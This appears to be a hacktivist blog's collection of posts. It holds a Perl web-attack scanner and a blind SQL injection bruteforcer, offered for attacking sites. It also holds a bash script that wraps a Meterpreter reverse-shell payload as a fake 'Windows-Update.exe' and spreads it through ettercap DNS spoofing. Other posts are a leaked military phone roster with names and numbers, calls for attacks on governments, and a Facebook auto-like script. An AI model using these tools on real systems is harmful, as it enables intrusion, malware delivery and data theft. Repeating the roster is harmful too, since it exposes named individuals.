      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending General attack strings..\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}}
}elsif($res =~ /7/){
      foreach my $scan(@MSSQL,@MSSQL,@XSS,@Unicode,@CGIs){
      my $host = $host.$scan;
      my $ua = LWP::UserAgent->new(‘Skid-Bot’);
      my $req = HTTP::Request->new(GET => $host);
      my $resp = $ua->request($req);
      my $reponse = HTTP::Response->new($resp);
    print “sending All attack strings..This going to get is noisy!\n”;

 if($resp->is_success and $resp->code() < “400”){
     openg(); print FG $resp->as_string;
}if($resp->code >= “400”){
     openb(); print FB $resp->as_string;
exit;
}
}}else{
   print “Error! Check the options and try again\n”;
}
sub openg{
  open(FG, “>>goodcodes.htm”);
}
sub openb{
  open(FB, “>>badcodes.htm”);
}

Blind SQL Injection Bruteforcer

Greetings Anons!

Our revolution has suffered much as of late, and it is necessary to step up our offensive methods. Defense is no longer the only option by which we can stick. We need to attack and take down oppressive websites, governments, and corporations worldwide. Below I have written a perl script for a blind sql bruteforcer. Enjoy and use with great fervor! Stay strong!

 

#!/usr/bin/perl
# Blind SQL Injection POC.omicronhatemail@gmail.com // TheRoyalAnon

use LWP::UserAgent;
use Getopt::Long;
use strict;

###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = \”GET\”;
my $default_time = \”0\”;
my $version = \”1.1\”;
my $default_useragent = \”bsqlbf $version\”;
my $default_dict = \”dict.txt\”;
my $default_sql = \”version()\”;
###############################################################################

$| = 1;

my ($args, $abc, $solution);
my ($string, $char, @dic);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my $hits = 0; 
my $usedict = 0; 
my $amatch = 0;
my ($ua,$req);

###############################################################################
# Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $charset, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent); 
my ($dict, $start, $length, $method, $cookie,$blind);
my $help;

my $options = GetOptions (
  \’help!\’           => \\$help, 
  \’url=s\’            => \\$url,
  \’sql=s\’             => \\$sql,
  \’blind=s\’           => \\$blind,
  \’match=s\’             => \\$match,
  \’charset=s\’       => \\$charset,
  \’start=s\’             => \\$start,
  \’length=s\’       => \\$length,
  \’dict=s\’           => \\$dict,
  \’method=s\’       => \\$method,
  \’uagent=s\’       => \\$uagent,
  \’ruagent=s\’       => \\$ruagent,
  \’cookie=s\’       => \\$cookie,
  \’proxy=s\’          => \\$proxy,
  \’proxy_user=s\’     => \\$proxy_user,
  \’proxy_pass=s\’     => \\$proxy_pass,
  \’rproxy=s\’     => \\$rproxy,
  \’debug!\’           => \\$debug, 
  \’rtime=s\’           => \\$rtime, 
  \’time=i\’           => \\$time );

&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
$abc          = charset();
$uagent     ||= $default_useragent; 
$debug    ||= $default_debug; 
$length     ||= $default_length; 
$solution     ||= $start;
$method     ||= $default_method;
$sql         ||= $default_sql;
$time         ||= $default_time;

&createlwp();
&parseurl();

if ( ! defined($blind)) {
        $lastvar = $varsb[$#varsb];
        $lastval = $vars{$lastvar};
} else {
        $lastvar = $blind;
        $lastval = $vars{$blind};
}

if (defined($cookie)) { &cookie() }

if (!$match) {
    print \”\\nTrying to find a match string…\\n\” if $debug eq 1;
    $amatch = \”1\”;
    &auto_match();
}

&banner();
&httpintro();
&bsqlintro();
 
#########################################################################
# Define CHARSET to use. Dictionary /// (TODO: fix ugly code)

$dict ||= $default_dict;
open DICT,\”$dict\”;  @dic=<DICT>; close DICT;

my $i;
my $nodict = 0;
for ($i=length($start)+1;$i<=$length;$i++) {
    my $furl;
    my $find = 0;
    $abc = charset();
    &bsqlintro if $debug eq 1;
    print \”\\r trying: $solution \”;
    foreach (split/ */,$abc) {
        $find = 0; 
        $char = ord();
        $string = \” AND MID($sql,$i,1)=CHAR($char)\”;
        if (lc($method) eq \”post\”) {
           $vars{$lastvar} = $lastval . $string;
        }
        print \”\\x08$_\”;
        $furl = $url;
        $furl =~ s/($lastvar=$lastval)/$1$string/;
        &createlwp if $rproxy || $ruagent;
        my $html=fetch(\”$furl\”);
        $hits++;
        foreach (split(/\\n/,$html)) {
             if (/\\Q$match\\E/) { 
                my $asc=chr($char);
                $solution .= $asc;
                $find = 1;
             }
            last if $find eq \”1\”;
            }
        last if $find eq \”1\”;
    }
    if ($usedict ne 0 && $find eq 0) { $nodict=1; $i–; }
    if ($find eq \”0\” && $usedict eq \”0\”) { last; };
}

&result();

#########################################################################
sub httpintro {
    my ($strcookie, $strproxy, $struagent, $i);
    print \”–[ http options ]\”; print \”-\”x62; print \”\\n\”;
    printf (\”%12s %-8s %11s %-20s\\n\”,\”schema:\”,$scheme,\”host:\”,$authority);
    if ($ruagent) { $struagent=\”rnd:$ruagent\” } else { $struagent = $uagent }
    printf (\”%12s %-8s %11s %-20s\\n\”,\”method:\”,uc($method),\”useragent:\”,$struagent);
    printf (\”%12s %-50s\\n\”,\”path:\”, $path);
    foreach (keys %vars) {
        $i++;
        printf (\”%12s %-15s = %-40s\\n\”,\”arg[$i]:\”,$_,$vars{$_});
    }
    if (! $cookie) { $strcookie=\”(null)\” } else { $strcookie = $cookie; }
    printf (\”%12s %-50s\\n\”,\”cookies:\”,$strcookie);
    if (! $proxy && !$rproxy) { $strproxy=\”(null)\” } else { $strproxy = $proxy; }
    if ($rproxy) { $strproxy = \”rnd:$rproxy\” }
    printf (\”%12s %-50s\\n\”,\”proxy_host:\”,$strproxy);
    if (! $proxy_user) { $strproxy=\”(null)\” } else { $strproxy = $proxy_user; }
    printf (\”%12s %-50s\\n\”,\”proxy_user:\”,$strproxy);
}

sub bsqlintro {
    my ($strstart, $strblind, $strlen, $strmatch, $strsql);
    print \”\\n–[ blind sql injection options ]\”; print \”-\”x47; print \”\\n\”;
    if (! $start) { $strstart = \”(null)\”; } else { $strstart = $start; }
    if (! $blind) { $strblind = \”(last) $lastvar\”; } else { $strblind = $blind; }
    printf (\”%12s %-15s %11s %-20s\\n\”,\”blind:\”,$strblind,\”start:\”,$strstart);
    if ($length eq $default_length) { $strlen = \”$length (default)\” } else { $strlen = $length; }
    if ($sql eq $default_sql) { $strsql = \”$sql (default)\”; } else { $strsql = $sql; }
    printf (\”%12s %-15s %11s %-20s\\n\”,\”length:\”,$strlen,\”sql:\”,$strsql);
    printf (\”%12s %-50s\\n\”,\”charset:\”,$abc);
    if ($amatch eq 1) { $strmatch = \”auto match:\” } else { $strmatch = \”match:\”; }
    #printf (\”%12s %-60s\\n\”,\”$strmatch\”,$match);
    print \” $strmatch $match\\n\”;
    print \”-\”x80; print \”\\n\\n\”;
}
#########################################################################

sub createlwp {
    my $proxyc;
    &getproxy;
    &getuagent;
    LWP::Debug::level(\’+\’) if $debug gt 3;
    $ua = new LWP::UserAgent(
        cookie_jar=> { file => \”$$.cookie\” }); 
    $ua->agent(\”$uagent\”);
    if (defined($proxy_user) && defined($proxy_pass)) {
        my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
        $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
        $proxyc = $pscheme.\”://\”.$proxy_user.\”:\”.$proxy_pass.\”@\”.$pauthority;
    } else { $proxyc = $proxy; }
    
    $ua->proxy([\’http\’] => $proxyc) if $proxy;
    undef $proxy if $rproxy;
    undef $uagent if $ruagent;
}    

sub cookie {
    # Cookies check
    if ($cookie || $cookie =~ /; /) {
        foreach my $c (split /;/, $cookie) {
            my ($a,$b) = split /=/, $c;
            if ( ! $a || ! $b ) { die \”Wrong cookie value. Use -h for help\\n\”; }
        }
    }
}

sub parseurl {
 ###############################################################################
 # Official Regexp to parse URI. Thank you somebody.
    ($scheme, $authority, $path, $query, $fragment) =
        $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
    # Parse args of URI into %vars and @varsb.
    foreach my $varval (split /&/, $query) {
        my ($var, $val) = split /=/, $varval;
        $vars{$var} = $val;
        push(@varsb, $var);
    }
}

sub charset {
    if ($hits ne 0 && $nodict eq 0) {
        my (%tmp,@b,$foo); undef %tmp; undef @b; undef $abc;
        foreach my $line (@dic) {
            chomp $line; 
               if ($line =~ /\\Q$solution\\E/ && $line !~ /^#/) {
                $foo = $line; $foo =~ s/\\Q$solution\\E//;
                 foreach ((split/ */,$foo)) {
                      if ($tmp{$_} ne \”1\” ) {
                        $tmp{$_} = \”1\”; push (@b,$_);
                    }
                 }
            }
        }
            if ($#b >= 0) {
            foreach my $c (@b) { $abc .=$c;}
            $usedict = $abc;
            print \”\\nUsing a dictionary with this charset: $abc\\n\” if $debug eq 1;
         } else {
            $abc = chardefault()
         }
    } else {
            $abc = chardefault()
    }
    return $abc;
}

sub chardefault {
    my $tmp;
    $abc = $charset;
    if (lc($charset) eq \”md5\”) {
        $abc = \”abcdef0123456789\\$.\”;
    } elsif (lc($charset) eq \”num\”) {
        $abc = \”0123456789\”;
    } elsif (lc($charset) eq \”all\” || ! $charset) {
           $abc = \”abcdefghijklmnopqrstuvwxyz0123456789\\$.-_()[]{}Âş@=/\\\\|#?Âż&·!<>ñÑ\”;
    }
    # If a dictionary has been used before, remove chars from current charset
    if ($usedict ne 0) {
        foreach (split(/ */, $usedict)) {
            $abc =~ s/$_//;
        }
    }
    $usedict = 0;
    return $abc;
}

sub auto_match {
      $match = fmatch(\”$url\”);
}

#########################################################################
# Show options at running:
sub banner {
    print \”\\n // Blind SQL injection brute force.\\n\”;
    print \” // downloaded from securityoverride.com\\n\\n\”;
}

#########################################################################
# Get differences in HTML
sub fmatch {
 my ($ok,$rtrn);
 my ($furla, $furlb) = ($_[0], $_[0]);
 my ($html_a, $html_b);
 if (lc($method) eq \”get\”) {
    $furla =~ s/($lastvar=$lastval)/$1 AND 1=1/;
    $furlb =~ s/($lastvar=$lastval)/$1 AND 1=0/;
     $html_a = fetch(\”$furla\”);
    $html_b = fetch(\”$furlb\”);
 } elsif (lc($method) eq \”post\”) {
   $vars{$lastvar} = $lastval . \” AND 1=1\”;
   $html_a = fetch(\”$furla\”);
   $vars{$lastvar} = $lastval . \” AND 1=0\”;
   $html_b = fetch(\”$furla\”);
   $vars{$lastvar} = $lastval;
 }
 my @h_a = split(/\\n/,$html_a);
 my @h_b = split(/\\n/,$html_b);
 foreach my $a (@h_a) {
    $ok = 0;
    if ($a =~ /\\w/) {
           foreach (@h_b) {
            if ($a eq $_) {$ok = 1; }
        }
    } else { $ok = 1; }
   $rtrn = $a;
   last if $ok ne 1;
 }
 return $rtrn;
}

#########################################################################
# Fetch HTML from WWW
sub fetch {
    my $secs;
    if ($time eq 0) { $secs = 0 }
    elsif ($time eq 1) { $secs = 15 }
    elsif ($time eq 2) { $secs = 300 }
    if ($rtime =~ /\\d*-\\d*/ && $time eq 0) {
        my ($l,$p) = $rtime =~ m/(\\d+-\\d+)/;
        srand; $secs = int(rand($p-$l+1))+$l;
    } elsif ($rtime =~ /\\d*-\\d*/ && $time ne 0) {
        print \”You can\’t run with -time and -rtime. See -help.\\n\”;
        exit 1;
    }
    sleep $secs;
    
    my $res;
    if (lc($method) eq \”get\”) {
        my $fetch = $_[0];
        if ($cookie) {
            $res = $ua->get(\”$fetch\”, Cookie => \”$cookie\”);
        } elsif (!$cookie) {
            $res = $ua->get(\”$fetch\”);
        }
    } elsif (lc($method) eq \”post\”) {
        my($s, $a, $p, $q, $f) =
          $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\\?([^#]*))?(?:#(.*))?|; 
        my $fetch = \”$s://$a\”.$p;
        if ($cookie) {
            $res = $ua->post(\”$fetch\”,\\%vars, Cookie => \”$cookie\”);
        } elsif (!$cookie) {
            $res = $ua->post(\”$fetch\”,\\%vars);
        }
    } else {
        die \”Wrong httpd method. Use -h for help\\n\”;
    }
    my $html = $res->content();
    return $html;
}

sub getproxy {
    if ($rproxy && $proxy !~ /http/) {
        my @lproxy;
        open PROXY, $rproxy or die \”Can\’t open file: $rproxy\\n\”;
        while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
        close PROXY;
        srand; my $ind = rand @lproxy;
        $proxy = $lproxy[$ind];
    } elsif ($rproxy && $proxy =~ /http/)  {
        print \”You can\’t run with -proxy and -rproxy. See -help.\\n\”;
        exit 1;
    }
}

sub getuagent {
    if ($ruagent && $uagent !~ /bsqlbf/) {
        my @uproxy;
        open UAGENT, $ruagent or die \”Can\’t open file: $ruagent\\n\”;
        while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
        close UAGENT;
        srand; my $ind = rand @uproxy;
        $uagent = $uproxy[$ind];
    } elsif ($ruagent && $uagent !~ /bsqlbf/)  {
        print \”You can\’t run with -uagent and -ruagent. See -help.\\n\”;
        exit 1;
    }
}

sub result {
    print \”\\r results:                                  \\n\” .
     \” $sql = $solution\\n\” if length($solution) gt 0 and $debug eq 0;
    print \”\\n results:                                  \\n\” .
     \” $sql = $solution\\n\” if length($solution) gt 0 and $debug eq 1;
    print \” total hits: $hits\\n\”;
}

sub help {
    &banner();
    print \” usage: $0 <-url http://www.host.com/path/script.php?foo=bar&gt; [options]\\n\”;
    print \”\\n options:\\n\”;
    print \” -sql:\\t\\tvalid SQL syntax to get; connection_id(), database(),\\n\”;
    print \”\\t\\tsystem_user(), session_user(), current_user(), last_insert_id(),\\n\”; 
    print \”\\t\\tuser() or all data available in the requested query, for\\n\”;
    print \”\\t\\texample: user.password. Default: version()\\n\”;
    print \” -blind:\\tparameter to inject sql. Default is last value of url\\n\”;
    print \” -match:\\tstring to match in valid query, Default is try to get auto\\n\”;
    print \” -charset:\\tcharset to use. Default is all. Others charsets supported:\\n\”;
    print \” \\tall:\\tabcdefghijklmnopqrstuvwxyz0123456789\\$.-_()[]{}Âş@=/\\\\|#?Âż&·!<>ñÑ\\n\”;
    print \” \\tnum:\\t0123456789\\n\”;
    print \” \\tmd5:\\tabcdef0123456789\\$\\n\”;
    print \” \\tcustom:\\tyour custom charset, for example: \\\”abc0123\\\”\\n\”;
    print \” -start:\\tif you know the beginning of the string, use it.\\n\”;
    print \” -length:\\tmaximum length of value. Default is $default_length.\\n\”;
    print \” -dict:\\t\\tuse dictionary for improve speed. Default is dict.txt\\n\”;
    print \” -time:\\t\\ttimer options:\\n\”;
    print \” \\t0:\\tdont wait. Default option.\\n\”;
    print \” \\t1:\\twait 15 seconds\\n\”;
    print \” \\t2:\\twait 5 minutes\\n\”;
    print \” -rtime:\\twait random seconds, for example: \\\”10-20\\\”.\\n\”;
    print \” -method:\\thttp method to use; get or post. Default is $default_method.\\n\”;
    print \” -uagent:\\thttp UserAgent header to use. Default is $default_useragent\\n\”;
    print \” -ruagent:\\tfile with random http UserAgent header to use.\\n\”;
    print \” -cookie:\\thttp cookie header to use\\n\”;
    print \” -rproxy:\\tuse random http proxy from file list.\\n\”;
    print \” -proxy:\\tuse proxy http. Syntax: -proxy=http://proxy:port/\\n\”;
    print \” -proxy_user:\\tproxy http user\\n\”;
    print \” -proxy_pass:\\tproxy http password\\n\”;
    print \”\\n example:\\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \\\”user()\\\”\\n\”;
    exit(1);

Our Inalienable Right to Freedom

The Internet is not a free place. It is rife with censorship, consumerism, and bigots functioning as over-sized corporations. In nations such as China, Vietnam, Russia, and many Arab countries, the Internet is heavily censored and often looked upon as a danger to national security. The propaganda must stop. Corporations, governments, bigots, censors, we’ve had enough! The time to stand down is now! This autocracy must end. Ever since the Arab Spring of two years ago, the Middle East has been torn by war, both civil and international. The ideals of freedom and liberty have long been lost in the smell of gunpowder and the blast of guns. And yet, even with these uprisings, in many of these countries the Internet remains heavily censored and monitored. The Great Firewall of China still stands as tall as ever. Many of the citizens of these countries do not even realize their freedoms are being taken from them, as autocracy is all they have ever known. If we believe in humanity, if we believe in freedom, in liberty, it is our inalienable duty to help the oppressed. Anonymous is not weak. Yes, we have lost many to arrests, but many still lurk in the shadows, waiting for the moment to strike. That moment is now! Wake up! Fight! The time will come when this fight is no longer ours, but that day is not this day. And until that day, we will fight or we will die trying, for freedom is our inalienable right. Stay strong my friends.

In time do I return

Greetings Anonymous,

For some time I have been away, and to tell you the truth, I had given up hope. I had given up hope that we could rise up and be something greater than ourselves. But, while my hope remains small, I have realized that a new generation of anonymous has arisen. So, to the soldiers of yesterday, let this be a swift wake-up call. Let us act now, for if we do not, time will surely turn our fate against us. Do not let these children make a mockery of us, fight! And stay strong.

1st Battalion 25th Marines Phone Roster

1st Battalion 25th Marines Phone Roster

DIAL 9 TO GET AN OUTSIDE LINE
DIAL 8 FOR DSN CALLS, LOCAL DSN PREFIX IS 256

SECTION/BILLET NAME ROOM TEL NUMBER TYPE
BATTALION
I&I LTCOL NEIL 114 978-796-2825
BN CO LTCOL OLEARY 113 978-798-2957
BN XO LTCOL KREIDER 115 978-796-2830
BN CHAPALIN LT GORMAN 111 978-796-2799
PWST MAJ KENSELLA 202
I&I SGTMAJ SGTMAJ WELLS 110 978-796-2827
BN SGTMAJ SGTMAJ TOMELLERI 102 978-796-2732
FRO DANIELLE SABOURIN 112 978-796-2753
S-1
S-1 CHIEF MSGT SORNIG 103 978-796-2828
S-1 ADJUTANT WO GARCIA 103 978-796-2797
S-1 ADMIN CHIEF SGT SMITH 106 978-796-2848
S-1 ADMIN SGT NIVAR 106 978-796-2754
S-1 ADMIN SGT DELEON 106 978-796-2836
S-1 ADMIN SGT RADCLIFFE 106 978-796-2955
CAREER PLANNER SSGT COCHRAN 109 978-796-2732
S-1 FAX MACHINE ADMIN FAX 106 978-796-2847 FAX
S-2
S-2 CPL MOFFETT 214 978-796-2959
S-3
S-3 133 978-796-2756
GUNNER GUNNER NOEL 133 978-796-2733
S-3 CHIEF/OPS MSGT DERVIN 135 978-796-2831
S-3 ASSISTANT CHIEF/OPS SSGT RITCHIE 135 978-796-3106
S-3 SCHOOLS/AMMO SSGT RITCHIE 135 978-796-3106
S-3 SCHOOLS/AMMO CPL LASCELLES 135 978-796-3106
S-4
S-4 CAPT WARAKSA 147 978-796-2745
S-4 CHIEF GYSGT SANDS 135 978-796-2817
S-4 EMBARK CHIEF SGT SCHIBNER 135 978-796-2820
S-4 MMC SGT MENDES 135 978-796-2820
S-4 ARMORY CHIEF (BN) SGT GILLEY 135 978-796-2820
S-4 SUPPLY NCO CPL NEWSOME 135 978-796-2817
S-4 MOTOR T CHIEF GYSGT NOWOSIELSKI MOTOR POOL 978-796-2674
S-4 MEDICAL HMC SANDERS 129 978-796-2748
S-4 FAX MEDICAL FAX 129 978-796-2833 FAX
SITE SUPPORT
S-4 SITE SUPPLY ADMIN CHIEF SGT CHAN 143 978-796-2757
S-4 WAREHOUSE CHIEF SGT CARDIN 143 978-796-2730
S-4 DASF NCO SGT VELA 143 978-796-2730
S-4 MMC SGT MORIN 143 978-796-2757
S-4 ARMORY (H&S) SGT GEORGE 134B 978-796-2804
S-4 ARMORY (WPNS) SGT MONAHAN 134B 978-796-2804
S-6
S-6 CHIEF GYSGT MORAN 146 978-796-2842
S-6 MAINTENANCE CHIEF SSGT JONES 146 978-796-2802
S-6 DATA CHIEF SGT ROLAND 146 978-796-2734
H&S COMPANY
I&I MAJ DOUGLAS 204 978-796-2811
COMPANY CO CAPT CUNNINGHAM 203B 978-796-3977
I&I 1STSGT 1STSGT NEWCOMB 203C 978-796-2731
COMPANY 1STSGT 203B 978-796-3977
COMPANY TRAINING CHIEF SSGT LEBLANC, A. 203B 978-796-3977
COMPANY GYSGT SSGT FELICIANO 203B 978-796-3977
WPNS COMPANY
I&I MAJ DOUGLAS 204 978-796-2811
COMPANY CO MAJ STOFFOLANO 207 978-796-2845
I&I 1STSGT 1STSGT NEWCOMB 203C 978-796-2731
COMPANY 1STSGT 1STSGT SHEINKIN 207 978-796-2845
COMPANY TRAINING CHIEF GYSGT MARTIN 207 978-796-2845
COMPANY ASST. TRAINING CHIEF 207 978-796-2845
OTHER NUMBERS
WOUNDED WARRIORS HMC SANDERS 129 978-796-2748
UNIT VOTING OFFICER SSGT COCHRAN 109 978-796-2732
ATFP
INTEL OVERSIGHT
SECURITY MANAGER GYSGT MORAN
ASST. SECURITY MANAGER
UVA SSGT COCHRAN 109 978-796-2732
EOR GYSGT MORAN 203A 978-796-2842
SACO GYSGT MARTIN 207 978-796-2845
PRIVACY ACT MSGT SORNIG 103 978-796-2828
EDUCATION OFFICER 203A 978-796-2842
SAFETY MANAGER
HAZMAT MANAGER SGT SCHIBNER 135 978-796-2820
CONFERENCE ROOM 116 978-796-2841
CLASS ROOM 978-796-2841

Easy Firewall Pass

  1. !/bin/bash
  2.  
  3. #Simple Bypass Firewall ( Easy metasploit + dns spoofing etc )
  4.  
  5. #Created By Dabllink, Royal, Trolpol, Trolloll, TopsToGod…
  6.  
  7. #save this file @ root
  8.  
  9. #Thanks to :
  10.  
  11. #p0zh1e,SoNz,BeraagaZZS, haryo aka autorun.inf, Syndrom2211, SutuL , Ihsan , all lost-c0de & CBF crew….
  12.  
  13. #special thanks to : Master Blusp10it & Red-Dragon..
  14.  
  15. clear
  16.  
  17. apt-get install figlet
  18.  
  19. clear
  20.  
  21. echo “#################################################”
  22.  
  23. figlet Dabllink
  24.  
  25. echo “#################################################”
  26.  
  27. echo
  28.  
  29. echo -en “masukan ip anda : “
  30.  
  31. read ip
  32.  
  33. echo
  34.  
  35. echo -en “masukan port anda: “
  36.  
  37. read port
  38.  
  39. echo
  40.  
  41. echo “Tunggu , sedang di proses…..”
  42. msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/Windows-Update.exe
  43. clear
  44. panggilmsfcli() {
  45. msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$port LHOST=$ip E
  46. }
  47.  
  48.  
  49. gnome() {
  50.  
  51. echo ‘#!/bin/bash
  52. cetaklagi() {
  53. echo ” dns spoofing :)”
  54. echo
  55. echo -en ” masukan interfaces anda : “
  56. read interfaces
  57. echo -en ” apa anda sudah punya target ? (y/n) “
  58. read pilihan
  59. if [ $pilihan == “y” ]; then
  60. echo -en ” masukan ip korban : “
  61. read ipkorban
  62. echo -en ” masukan ip gateway : “
  63. read ipgateway
  64. ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
  65. elif [ $pilihan == “n” ]; then
  66. ettercap -Tqi $interfaces -P dns_spoof -M arp // //
  67. else
  68. cetaklagi
  69. fi
  70. exec bash
  71. }
  72. cetaklagi’ > /root/spoof.sh
  73. clear
  74. echo “Sedang membuka terminal baru”
  75. sleep 2
  76. chmod +x spoof.sh
  77. gnome-terminal –command=”./spoof.sh”
  78. echo “exploit…………………………………….. “
  79. panggilmsfcli
  80. }
  81.  
  82. kde() {
  83. echo ‘#!/bin/bash
  84. cetaklagi() {
  85. echo ” dns spoofing :)”
  86. echo
  87. echo -en ” masukan interfaces anda : “
  88. read interfaces
  89. echo -en ” apa anda sudah punya target ? (y/n) “
  90. read pilihan
  91. if [ $pilihan == “y” ]; then
  92. echo -en ” masukan ip korban : “
  93. read ipkorban
  94. echo -en ” masukan ip gateway : “
  95. read ipgateway
  96. ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
  97. elif [ $pilihan == “n” ]; then
  98. ettercap -Tqi $interfaces -P dns_spoof -M arp // //
  99. else
  100. cetaklagi
  101. fi
  102. exec bash
  103. }
  104. cetaklagi’ > /root/spoof.sh
  105. clear
  106. echo “Sedang membuka terminal baru”
  107. sleep 2
  108. chmod +x spoof.sh
  109. konsole –noclose -e ./spoof.sh
  110. echo “exploit…………………………………….. “
  111. panggilmsfcli
  112.  
  113. }
  114.  
  115. clear
  116. /etc/init.d/apache2 start
  117. clear
  118.  
  119. rm /var/www/index.html
  120. echo ‘<html>
  121. <head>
  122. <title>Warning!!!</title>
  123. </head>
  124. <body>
  125. <p align=”center”><u><b>Perhatian:</u></b>Update Windows anda jika ingin tetap melanjutkan browsing.<br>Pastikan tidak ada yang menghambat saat update berjalan, <br>seperti Antivirus</p>
  126. <p align=”center”>
  127. <input align=”center” type=”button” name=”Button” value=”Download Update” onClick=”window.open’ >> /var/www/index.html
  128. echo “(‘/Windows-Update.exe’,’download’);” >> /var/www/index.html
  129. echo ‘return false;”></p>
  130. </body>
  131. </html>’ >> /var/www/index.html
  132. clear
  133. cetak() {
  134. echo “1. /usr/local/share/ettercap/etter.dns”
  135. echo
  136. echo “2. /usr/share/ettercap/etter.dns “
  137. echo
  138. echo -en “Masukan tempat etter.dns anda berada (1/2): “
  139. read pilihan
  140. if [ $pilihan == “1” ]; then
  141. echo “* A $ip” > /usr/local/share/ettercap/etter.dns  
  142. elif [ $pilihan == “2” ]; then
  143. echo “* A $ip” > /usr/share/ettercap/etter.dns
  144. else
  145. clear
  146. cetak
  147. fi
  148. }
  149. cetak
  150. clear
  151.  
  152.  
  153. echo -en “Anda menggunakan kde/gnome? “
  154. read pilihanzz
  155. $pilihanzz

Spreading the Gospel of Anon

The best way to get the word out about hacktivism is through social networks – and the most popular of these is by far facebook. The question, then, is how to make a facebook page more popular. Facebook blocks the use of automated scripts and deletes fake accounts rather quickly – so that wouldn’t work. However when you comment on other people’s posts and like other people’s pages your name spreads quickly and shows up often. This seems to be the best way to get your name out on facebook. But, then again, who has the time to surf facebook and manually like and comment on so many pages. That is why I have coded this scrrpt. It automates the process of liking and commenting so that anonymous accounts can spread wider and farther then ever before. Remember: when peaceful revolution becomes impossible – violent revolution becomes inevitable. Stay strong, my friends, stay strong!

 

// @name           Facebook AutoLike
// @namespace      AutoLike
// @description    Automaticly like facebook statuses and comments
// @include        http://www.facebook.com/*
// ==/UserScript==

// ==Credits==
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+122px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"/muhdfadzli95\">Leaked by iEatNoodlez </a>"
	
	body.appendChild(div);
}
// ==============
// ==Expand==
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+102px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoExpand()\">Expand comments</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoExpand = function() {
	
		buttons = document.getElementsByTagName("input");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			if(myClass != null && myClass.indexOf("") >= 0)
				if(buttons[i].getAttribute("name") == "view_all[1]")
					buttons[i].click();
		}
		
	};
}
// ==============
// ==Statuses==
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+72px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoLike()\">Like all statuses</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoLike = function() {
	
		buttons = document.getElementsByTagName("button");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			if(myClass != null && myClass.indexOf("like_link") >= 0)
				if(buttons[i].getAttribute("name") == "like")
					buttons[i].click();
		}
		
	};
}
// ==============
// ==Unlike Statuses==
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+52px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoUnLike()\">Unlike all statuses</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoUnLike = function() {
	
		buttons = document.getElementsByTagName("button");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			if(myClass != null && myClass.indexOf("like_link") >= 0)
				if(buttons[i].getAttribute("name") == "unlike")
					buttons[i].click();
		}
		
	};
}
// ==============
// ==Comments==
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+22px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoLikeComments()\">Like all comments</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoLikeComments = function() {
	
		buttons = document.getElementsByTagName("button");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			if(myClass != null && myClass.indexOf("") >= 0)
				if(buttons[i].getAttribute("title") == "Like this comment")
					buttons[i].click();			
															
		}
		
	};
}
// ==============
// ==Unlike Comments==
body = document.body;
if(body != null) {
	div = document.createElement("div");
	div.style.position = "fixed";
	div.style.bottom = "+2px";
	div.style.left = "+6px";
	div.style.backgroundColor = "#eceff5";
